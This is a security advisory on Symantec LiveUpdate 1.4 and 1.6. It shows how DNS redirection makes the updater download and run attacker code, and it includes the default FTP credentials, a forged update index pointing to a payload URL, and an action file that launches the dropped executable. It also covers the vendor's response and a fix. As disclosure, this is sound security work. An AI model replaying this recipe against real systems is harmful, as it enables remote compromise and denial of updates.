|
|
|
|
| |
LiveUpdate is a tool shipped with most Symantec products to download updates from the Symantec update servers. It is included as part of the Norton Antivirus Package and several other products in the Symantec product line.
Version 1.4 of LiveUpdate (shipped with Norton Antivirus 5.x) can be used for rapid deployment of hostile code (backdoors, Trojan applications, viruses, worms - if unknown to Norton Anti Virus) and for remote penetration of systems running LiveUpdate via redirection of the initial connection to a server controlled by the attacker.
Version 1.6 of LiveUpdate (shipped with the latest Norton Antivirus 2001 package) does not allow for this type of attack, but it can be prevented from downloading virus descriptions and product updates. It can also be used as part of distributed denial of service attacks by the same attack as described for version 1.4. |
| |
Credit:
The information has been provided by FX.
|
| |
Vulnerable systems:
Symantec LiveUpdate version 1.4
Symantec LiveUpdate version 1.6
When LiveUpdate 1.4 is started (either by hand or as a scheduled task), it looks for the server update.symantec.com. An attacker can use one of several attacks to return false information to the querying host such as:
- The attacker controls the DNS server and creates a master zone for symantec.com.
- The attacker uses routing-based attacks to impersonate the DNS server.
- The attacker uses DNS poisoning on the DNS server to return a false IP address.
- The attacker uses layer 2 connection interception to impersonate the DNS server.
- The attacker sends false DNS responses to the querying host.
When the host running LiveUpdate tries to connect to update.symantec.com via FTP, it is actually connecting to the FTP server of the attacker's choice. LiveUpdate will then try to receive the file livetri.zip located in the FTP server directory /opt/content/onramp. This archive contains the file LIVEUPDT.TRI that holds a complete list of all Symantec product updates. After LiveUpdate has received the file, it will compare the product versions to the versions of the Symantec products installed on the host and check the appropriate sequence numbers to see if an update is required. If an update is required, LiveUpdate will receive the file specified, uncompress it (ZIP format), and perform the actions described in the .dis file. This includes the execution of downloaded executables. The reader might see by now how an attacker can use this behavior in ways other than intended by Symantec.
LiveUpdate 1.6 follows the same procedure described above with one exception. The actual downloaded update package is different. First, it is no longer a classic ZIP archive but rather some type of Symantec data compression. Additionally, the file contains "cryptographic signatures" of all update files. This signature makes it virtually impossible to use LiveUpdate 1.6 as penetration tool. However, by specifying a large file location on the Internet, a scheduled LiveUpdate session in a medium sized company will lead to network degradation and outages due to the large amount of traffic generated.
An item of interest is that version 1.6 does not use cryptographic signatures to verify the initial list LIVEUPDT.TRI even though it places signatures on all other files. By applying the attack described above and never changing the content of the file, one can prevent any updates the victim host might require.
Example:
An example attack was performed for LiveUpdate 1.4 by taking over a DNS server and creating a master zone for symantec.com. A false address for the FTP server update.symantec.com was then returned. This FTP server was configured to with the user 'cust-r2', which is used by LiveUpdate with the password 'Alpc2p30'. It is not known if all LiveUpdate installations use the same username and password - but it is not relevant.
The file /opt/content/onramp/livetri.zip contained a modified LIVEUPDT.TRI file with the following content:
[LiveUpdate]
Legal=Copyright 1995-2000 (c) Symantec Corporation
LastModified=20010920 05:58PM
Type0=Updates
Type1=Add-Ons
Type2=Documentation
[Mandatory0]
Exclusive=FALSE
ProductName=LiveUpdate
Version=1.4
Language=English
ItemSeqName=LiveUpdateSeq
ItemSeqData=20000508
FileName=ihack.x86
Size=624807
ActionItem=noreboot.dis
TypeName=Updates
ItemName=LiveUpate 1.6
ItemDetails=Hacks your computer using LiveUpdate
Platform=x86
AdminCompatible=FALSE
URL=http://www.example.com/hackme.x86
While LiveUpdate 1.4 has a preference to use the FileName entry and tries to receive the file via FTP, 1.6 prefers the URL given. Since this is a mandatory update for LiveUpdate itself, it will receive the file first and then try to update itself.
The file ihack.x86 is actually a renamed ihack.zip file with the following content:
NOREBOOT.DIS
LUUPDATE.EXE
LUSETUP.EXE
LUUPDATE.EXE is the Trojan/backdoor/whatever file the attacker wants the system to execute. NOREBOOT.DIS is a INI-like file that contains the actions LiveUpdate should perform when downloading of the file is complete. It has the following content:
UPDATE (TempDir\*.EXE, LiveUpdateDir, 0)
LAUNCH (LiveUpdateDir, LUUPDATE.EXE, "", 0)
DELAYDELETE (LiveUpdateDir, LUUPDATE.EXE)
LUSETUP.exe was part of a real update package we inspected and might be left out - this was not tested. We just used the same file as LUUPDATE.exe and it worked.
When the victim host triggered the update mechanism, it downloaded livetri.zip and then ihack.x86. It then executed the application LUUPDATE.exe and told the user "the update was successfully completed. Thank you."
Vendor response:
According to symsecurity@symantec.com, LiveUpdate 1.4 is no longer the current version and every installation should be updated to version 1.6 by now.
Regarding the redirection of the LiveUpdate client, Symantec stated: "This is, unfortunately, an underlying issue with the Internet infrastructure that we are well aware of but have limited control over other than with connection points over which we exercise authority."
As for the denial of service condition, the statement is: "The denial of service activity, while potentially possible under the scenarios you indicate below, would affect only a small percentage of our user base as any spoofing, redirection would be limited to a local Internet area/region."
Solution:
The improvements Symantec introduced in LiveUpdate 1.6 and higher are actually, "best practice security". It would be advisable to update all Symantec products using LiveUpdate to version 1.6. This however does not prevent an attacker from using LiveUpdate as denial of service tool or preventing system updates.
Symantec should use the same cryptographic signature method on the livetri.zip file and advise its customer base off the fact that LiveUpdate 1.4 is highly insecure.
Beware! LiveUpdate 1.4 WILL NOT updates itself to 1.6 as far as we are able to determine. The latest LiveUpdate 1.6.x is available from the URL http://www.symantec.com/techsupp/files/lu/lu.html
According to Symantec, the next version of LiveUpdate will further enhance security. No statement about the nature of these enhancements was made.
|
|
|
|
|
|
|
